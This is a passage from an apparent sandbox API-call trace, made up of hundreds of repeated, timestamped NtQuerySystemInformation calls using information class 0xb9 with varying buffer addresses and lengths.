Length=0x0, ResultLength=0x0) [0264.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbe0, Length=0x20, ResultLength=0x0) [0264.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdee8, Length=0x58, ResultLength=0x0) [0264.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfddb0, Length=0x58, ResultLength=0x0) [0264.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdcd0, Length=0x38, ResultLength=0x0) [0264.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb00, Length=0x28, ResultLength=0x0) [0264.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb00, Length=0x28, ResultLength=0x0) [0264.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb00, Length=0x28, ResultLength=0x0) [0264.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb00, Length=0x28, ResultLength=0x0) [0264.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb70, Length=0x28, ResultLength=0x0) [0264.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdcd0, Length=0x38, ResultLength=0x0) [0264.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbf0, Length=0x28, ResultLength=0x0) [0264.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbf0, Length=0x28, ResultLength=0x0) [0264.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdcd0, Length=0x38, ResultLength=0x0) [0264.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb50, Length=0x20, ResultLength=0x0) [0264.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdad0, Length=0x20, ResultLength=0x0) [0264.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdad0, Length=0x20, ResultLength=0x0) [0264.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdad0, Length=0x20, ResultLength=0x0) [0264.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdcd0, Length=0x38, ResultLength=0x0) [0264.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb50, Length=0x20, ResultLength=0x0) [0264.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdae0, Length=0x20, ResultLength=0x0) [0264.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdae0, Length=0x20, ResultLength=0x0) [0264.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfddb0, Length=0x58, ResultLength=0x0) [0264.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdcd0, Length=0x38, ResultLength=0x0) [0264.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb00, Length=0x28, ResultLength=0x0) [0264.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb00, Length=0x28, ResultLength=0x0) [0264.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb00, Length=0x28, ResultLength=0x0) [0264.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb00, Length=0x28, ResultLength=0x0) [0264.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb70, Length=0x28, ResultLength=0x0) [0264.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdcd0, Length=0x38, ResultLength=0x0) [0264.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbf0, Length=0x28, ResultLength=0x0) [0264.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbf0, Length=0x28, ResultLength=0x0) [0264.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda90, Length=0x20, ResultLength=0x0) [0264.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda10, Length=0x20, ResultLength=0x0) [0264.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda10, Length=0x20, ResultLength=0x0) [0264.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda10, Length=0x20, ResultLength=0x0) [0264.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdcd0, Length=0x38, ResultLength=0x0) [0264.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdcd0, Length=0x38, ResultLength=0x0) [0264.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb50, Length=0x20, ResultLength=0x0) [0264.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdae0, Length=0x20, ResultLength=0x0) [0264.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdae0, Length=0x20, ResultLength=0x0) [0264.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfddb0, Length=0x58, ResultLength=0x0) [0264.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdcd0, Length=0x38, ResultLength=0x0) [0264.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb00, Length=0x28, ResultLength=0x0) [0264.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb00, Length=0x28, ResultLength=0x0) [0264.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb00, Length=0x28, ResultLength=0x0) [0264.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb00, Length=0x28, ResultLength=0x0) [0264.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb70, Length=0x28, ResultLength=0x0) [0264.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdcd0, Length=0x38, ResultLength=0x0) [0264.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbf0, Length=0x28, ResultLength=0x0) [0264.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbf0, Length=0x28, ResultLength=0x0) [0264.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdcd0, Length=0x38, ResultLength=0x0) [0264.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb50, Length=0x20, ResultLength=0x0) [0264.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdad0, Length=0x20, ResultLength=0x0) [0264.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdad0, Length=0x20, ResultLength=0x0) [0264.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdad0, Length=0x20, ResultLength=0x0) [0264.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdcd0, Length=0x38, ResultLength=0x0) [0264.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb50, Length=0x20, ResultLength=0x0) [0264.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdae0, Length=0x20, ResultLength=0x0) [0264.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdae0, Length=0x20, ResultLength=0x0) [0264.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfddb0, Length=0x58, ResultLength=0x0) [0264.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc90, Length=0x38, ResultLength=0x0) [0264.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdad0, Length=0x28, ResultLength=0x0) [0264.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdad0, Length=0x28, ResultLength=0x0) [0264.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdad0, Length=0x28, ResultLength=0x0) [0264.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdad0, Length=0x28, ResultLength=0x0) [0264.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb40, Length=0x28, ResultLength=0x0) [0264.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc90, Length=0x38, ResultLength=0x0) [0264.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc90, Length=0x38, ResultLength=0x0) [0264.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbc0, Length=0x28, ResultLength=0x0) [0264.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbc0, Length=0x28, ResultLength=0x0) [0264.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc90, Length=0x38, ResultLength=0x0) [0264.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc90, Length=0x38, ResultLength=0x0) [0264.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda30, Length=0x20, ResultLength=0x0) [0264.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9b0, Length=0x20, ResultLength=0x0) [0264.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9b0, Length=0x20, ResultLength=0x0) [0264.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9b0, Length=0x20, ResultLength=0x0) [0264.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc00, Length=0x20, ResultLength=0x0) [0264.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc90, Length=0x38, ResultLength=0x0) [0264.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb20, Length=0x20, ResultLength=0x0) [0264.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdaa0, Length=0x20, ResultLength=0x0) [0264.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdaa0, Length=0x20, ResultLength=0x0) [0264.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdaa0, Length=0x20, ResultLength=0x0) [0264.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc90, Length=0x38, ResultLength=0x0) [0264.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb20, Length=0x20, ResultLength=0x0) [0264.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdaa0, Length=0x20, ResultLength=0x0) [0264.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdaa0, Length=0x20, ResultLength=0x0) [0264.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdaa0, Length=0x20, ResultLength=0x0) [0264.422] NtQuerySystemInformation (SystemInformationClass=0xb9, 